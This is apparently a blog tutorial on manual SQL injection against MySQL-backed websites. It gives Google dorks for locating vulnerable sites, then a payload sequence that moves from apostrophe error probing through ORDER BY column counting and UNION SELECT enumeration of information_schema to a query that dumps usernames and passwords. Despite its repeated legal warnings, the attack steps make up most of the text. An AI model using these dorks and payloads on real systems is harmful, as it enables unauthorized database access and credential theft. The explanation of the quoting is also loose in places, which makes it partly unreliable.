SQL
Injection
The
simple definition is Injecting the DB of the target or in other words the
complicated one as by OWASP
"A SQL injection attack consists of insertion or
"injection" of a SQL query via the input data from the client to the
application. A successful SQL injection exploit can read sensitive data from
the database, modify database data (Insert/Update/Delete), execute administration
operations on the database (such as shutdown the DBMS), recover the content of
a given file present on the DBMS file system and in some cases issue commands
to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are
injected into data-plane input in order to effect the execution of predefined
SQL commands."
I will
start with testing for SQL injection as it is the most important part, you will
never find anywhere
Also, you
can use below google dorks to find out Sites and check if they are vulnerable
to SQL.Most important don't check any live website without the their knowledge
and permission until and unless you guys have a legal contract.
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
and much
more
We can
check SQL injection by simply using a apostrophe check..
for
example the site is http://www.******.com/index.php?pid=1 //I have put all the
stars as people usually start targeting the same website without any knowledge
and it can put them in trouble.
I will
once again repeat the same thing "Don't touch any website without the end
website knowledge". THIS IS ILLEGAL.
Let's
start now..
When you
will apply a apostrophe( ' ) OR backslash( \ ) after a website link which is
vulnerable to this attack as described above, you will find the below error..
http://www.******.com/index.php?pid=1'
You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to
use near ''1\' LIMIT 0,1' at line 1
You should be happy, once you have received this kind of error, because
you are getting message directly from the database.. so start communicating,
use your full knowledge and enjoy
Now, i will not start like other articles on the internet which says
this is a trick to use a apostrophe- if you are also thinking that it is- then
read the below with concentration.
Consider the query :
Select name, password from table where id = ' any value '
This query will give a correct result when you are putting it as same.
But you have changed the value as 1' when you have applied a postrophe
at the end http://www.******.com/index.php?pid=1'
..so the resultant query will now become
Select name, password from table where id = ' 1' '
So, the problem is that the quotes should always occur in pair, as we
are not doing that so the error will definitely come.
So as we can see that we have control only over the part which is after id,
so we can also comment the part of the query using --(followed by space), --+
e.g: http://www.******.com/index.php?pid=1' my command area --+
so in the my command area specified above, i can append any query..
So, our 1st task is, how many columns are used in the query
which is linked with the URL we are modifying
http://www.******.com/index.php?pid=1'
Not sure, but let assume that the above URL is using similar kind of
query as below
Select name, password from table where id = 1',,,,,so we are not
sure at all whether it is having 1,2 or more columns.
So we can check this by appending order by query with the link above, as
the order by give error if we mention more columns number after the order by
clause which is not there on LHS of the Order by
In simple words - Select name, password from table where id = 1’
order by 2 --+
Sometime in order to make our appended query to work we may have to
remove ‘ which is after id value as we never know how the command is integrated
in the code, if we remove it then in that case it will work—depend on case by
case
where id = 1 order by 2 --+
If we give order by 3, it should give error because LHS of the query has
2 columns and how can we display 3 columns.
So this is the way, we can get to know the no of columns. The very
moment, it stopped showing error while changing the number after order by clause;
we can stop and determine the no of columns in that query.
Here we go with the link:
http://www.******.com/index.php?pid= 1' order by 4 --+ ‘(this at the end
apostrophe is commented by --+), also sometime it is bound by id=1’, so in that
case we hv to remove our ‘ in order to have our appended command to work.
the format should be same for determining the no of column as pid= 1' order by 4 - -+
the - -+ at the end will comment the query part which is after that
Suppose we got the number of columns are 3 so we will append our union query
as
http://www.******.com/index.php?pid= 1' union all select 1,2,3 --+
but in the o/p we won’t be able to see the result as the first part
before the union is true and it will always show the result, so we have to make
the first part as false, so it has to force fully execute the second statement
which is our union statement.
So we can do that by giving any
invalid value in pid, e.g pid=99999 or pid= -1(as negative id value never use
in the database), so it will invalidate the 1st part and the 2nd
part will execute, in simple words we have to give a false values in the PID
field, so that it will represent the value 1,2,3 at the places where earlier
the output from the actual statement was coming.
Now these 1,2,3 values, we can use this value as place holder and we can
give our own query in these places to know about the databases.
e.g we can replace these things with the database(), version(),
@@version and much more for the simplification. And we will get all the values
of the database which ever we will query
http://www.******.com/index.php?pid= 1' union all select 1,2,3 --+
SO WE WILL JUST REPLACE ANY OF THE VALUE BY 2 mentioned above.
For finding table name we will replace like following
pid=-2' union all select 1,table_name,3
from information_schema.tables--+
or in case u want it from the specified database
id=-2' union all select 1,table_name,3 from information_schema.tables
where table_schema=database()--+ or
database name in quotes we can mention here like below
id=-2' union all select 1,table_name,3 from information_schema.tables
where table_schema=’my database name’ --+
But there will be so many tables in that database, so we can use limit 0,1 to find the tables and every
time we can do an increment in the first place after limit and get the tables
name as below.
id=-2' union all select 1,table_name,3 from information_schema.tables
where table_schema=’my database name’ limit 0,1 --+
id=-2' union all select 1,table_name,3 from information_schema.tables
where table_schema=’my database name’ limit 1,1--+
and so on,,,,but again this is very bore method to check the name of the
table, so we want all the table name at once, go with group_concat method for
this approach
We will use group_concat(table_name)
to get all the table details..
id=-2' union all select 1,group_concat(table_name),3 from
information_schema.tables where table_schema=database() --+
in case we are not using the where clause “where
table_schema=database()”
in that, most of the cases it can lead to displaying only the
information_schema by defaults tables.
Now, I can proceed with finding the columns name, here I will go just
replacing the table with columns
id=-2' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+
But if I am interested in the column of 1 particular table, then I can
simply put that table name as
id=-2' union all select 1,group_concat(column_name),3 from
information_schema.columns where table_name='any table name'
now I got the table name, column name,so time to proceed with finding
the data as well.
So I will just do a simple query in the same field as below,,,no need of
any info-schema, as I know what is the table name ,,and what is the column name
now,,
id=-2' union all select 1,group_concat(password,0x3a,username),3 from tablename--+
0x3a will give the : in the o/p, so as to separate the o/p with username
and password
No comments:
Post a Comment